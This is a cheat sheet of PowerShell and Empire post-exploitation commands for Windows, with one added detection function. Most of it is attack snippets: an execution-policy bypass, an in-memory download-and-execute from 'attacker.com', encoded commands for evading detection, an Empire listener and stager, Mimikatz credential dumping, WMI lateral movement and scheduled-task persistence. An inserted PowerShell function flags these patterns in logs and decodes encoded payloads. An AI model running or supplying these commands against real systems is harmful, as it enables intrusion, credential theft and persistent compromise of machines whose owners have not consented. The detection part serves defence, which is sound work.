PowerShell & Empire
Notes and snippets for PowerShell usage and post-exploitation frameworks. This content focuses on Windows environments and common post-exploitation techniques.
PowerShell Basics & Snippets
Bypass Execution Policy
powershell.exe -ExecutionPolicy Bypass -File script.ps1
Execute PowerShell scripts without restrictions imposed by execution policies.
Download and Execute
IEX (New-Object Net.WebClient).DownloadString("http://attacker.com/script.ps1")
Download and execute a PowerShell script directly from a remote URL in memory.
Base64 Encoded Commands
powershell.exe -EncodedCommand BASE64_STRING
Execute Base64-encoded PowerShell commands to evade basic detection mechanisms.
Process Enumeration
Get-Process | Select-Object Name, Id, Path
List running processes with their names, IDs, and executable paths.
Network Connections
Get-NetTCPConnection | Select-Object LocalAddress, LocalPort, State
Enumerate active TCP network connections on the system.
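A defender-side counterpart to the snippets above, added here as an example and not part of the original notes: a PowerShell function that scans script-block log text for the execution-policy bypass, download-and-execute and -EncodedCommand patterns listed above and decodes the base64 payload so an analyst can read it. The function name, the regexes and the sample entries are this example's own assumptions/constructed input.

```powershell
# Added defender-side example, not from the original notes: scan PowerShell
# script-block text for the indicators covered above and decode any
# -EncodedCommand payload so an analyst can read it. On a live host the input
# would come from Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational'
# filtered to Event ID 4104; here a few constructed sample entries are embedded.

function Get-SuspiciousPowerShellIndicator {
    param([Parameter(Mandatory)][string[]]$ScriptBlockText)

    # Rule names and regexes are this example's own choices, mapped to the
    # snippets above. -imatch is case-insensitive, like PowerShell parsing.
    $rules = [ordered]@{
        'ExecutionPolicyBypass' = '-(ExecutionPolicy|ep)\s+Bypass'
        'DownloadAndExecute'    = '(IEX|Invoke-Expression).*(DownloadString|DownloadFile|Invoke-WebRequest)'
        'EncodedCommand'        = '-(EncodedCommand|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}'
    }

    foreach ($text in $ScriptBlockText) {
        foreach ($rule in $rules.GetEnumerator()) {
            if ($text -imatch $rule.Value) {
                $decoded = $null
                if ($rule.Key -eq 'EncodedCommand') {
                    # -EncodedCommand takes base64 of UTF-16LE text, so decode
                    # with the Unicode encoding, not UTF-8.
                    $b64 = @($text -split '\s+' | Where-Object { $_ -match '^[A-Za-z0-9+/=]{20,}$' })[0]
                    try {
                        $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($b64))
                    } catch { $decoded = "<undecodable: $b64>" }
                }
                [pscustomobject]@{ Rule = $rule.Key; Entry = $text; Decoded = $decoded }
            }
        }
    }
}

# Constructed sample script-block entries (not real telemetry). The base64
# string decodes to the harmless command Get-Date.
$sampleEntries = @(
    'powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\update.ps1',
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/s.ps1")',
    'powershell.exe -NoP -W Hidden -EncodedCommand RwBlAHQALQBEAGEAdABlAA==',
    'Get-Process | Select-Object Name, Id, Path'   # benign admin activity, no hit
)

Get-SuspiciousPowerShellIndicator -ScriptBlockText $sampleEntries | Format-List
```

The benign Get-Process entry produces no hit; the three others each yield one object, and the EncodedCommand hit shows the decoded Get-Date text, which is what script-block logging (Event ID 4104) also records for encoded invocations.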
Empire & Post-Exploitation Concepts
Listener Setup
uselistener http
set Host http://attacker.com
set Port 80
execute
Configure an HTTP listener in Empire to receive connections from compromised hosts.
Stager Generation
usestager windows/launcher_bat
set Listener http
generate
Generate a stager payload that will connect back to the Empire listener.
Credential Harvesting
usemodule credentials/mimikatz/logonpasswords
execute
Use Mimikatz through Empire to extract credentials from memory.
Lateral Movement
usemodule lateral_movement/invoke_wmi
set ComputerName TARGET_HOST
set Listener http
execute
Move laterally to other systems using Windows Management Instrumentation.
Persistence Mechanisms
usemodule persistence/elevated/schtasks
set DailyTime 09:00
set Listener http
execute
Establish persistence using scheduled tasks that execute at specified times.
Note
These techniques are for educational purposes and authorized penetration testing only. Always ensure you have explicit written permission before testing on any system.